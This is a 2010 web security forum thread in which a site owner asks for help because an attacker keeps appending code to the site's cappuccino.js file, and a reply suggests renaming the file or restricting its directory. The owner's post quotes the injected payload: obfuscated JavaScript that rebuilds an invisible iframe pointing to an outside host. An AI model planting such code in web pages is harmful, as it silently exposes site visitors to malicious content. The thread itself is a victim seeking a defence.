Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
June 21, 2024
 Members List
 IRC chat
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 Sql Char Encoder
 y3dips ITsec
 Md5 Cracker
 User Manuals
 Recommend Us
 Your Account

User Info
Welcome, Anonymous

Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 472
Members: 0
Total: 472
PacketStorm News
·301 Moved Permanently

Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Newbies corner -> A file on my site is vulnerable. Please help.
Post new topic  Reply to topic View previous topic :: View next topic 
A file on my site is vulnerable. Please help.
PostPosted: Sun Mar 07, 2010 8:19 am Reply with quote
Joined: Mar 07, 2010
Posts: 1

If anyone could help I would greatly appreciate it.
A javascript file on my site seems to be vulnerable to some sort of attack where the hacker is able to append an iframe to the bottom of the file. I've tried a few things such as changing permissions on the file however this has not helped. Please can someone offer any suggestions. I have researched this on google and have only found one relevant link here: http://www.vbulletin.com/forum/showthread.php?338741-vBulletin-Footer-SQL-Injection-Hack

The page that is being targeted is called cappuccino.js and this is the code is available here:


This is the code the attacker is able to append to the script:
var _0x510763= ["\x77\x72\x69\x74\x65"]; var aBaBa=document; var acBBa = '<iframJQ21KL#AZ XLMS9Q21rc="http%3A%2F%2Fimg121.imagehacks.info%2Fimg121%2F103%2Fheader.jpeg" width="1" hJQ21KL#AZight="0" framJQ21KL#AZbordJQ21KL#AZr="0"></iframJQ21KL#AZ>'; var cBccB = acBBa.replace(/XLMS9Q21/g,"s"); var BBcac = cBccB.replace(/LSM21ghk8/g,"o"); var cBcca = BBcac.replace(/JQ21KL#AZ/g,"e");aBaBa[_0x510763[0]](unescape(cBcca));
View user's profile Send private message
Re: A file on my site is vulnerable. Please help.
PostPosted: Fri Mar 19, 2010 11:15 pm Reply with quote
Regular user
Regular user
Joined: Mar 16, 2010
Posts: 14
Location: Bulgaria

Hehe funny, just change name of that script with another .
You said you are tried with htaccess file? I dont think so , or you are wrong something Smile just restrict the DIR of the file .

http://www.arthackers.net - Web Security Portal!
View user's profile Send private message Visit poster's website MSN Messenger
A file on my site is vulnerable. Please help.
  www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 1  

 Post new topic  Reply to topic  

Powered by phpBB 2001-2008 phpBB Group

Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.167 Seconds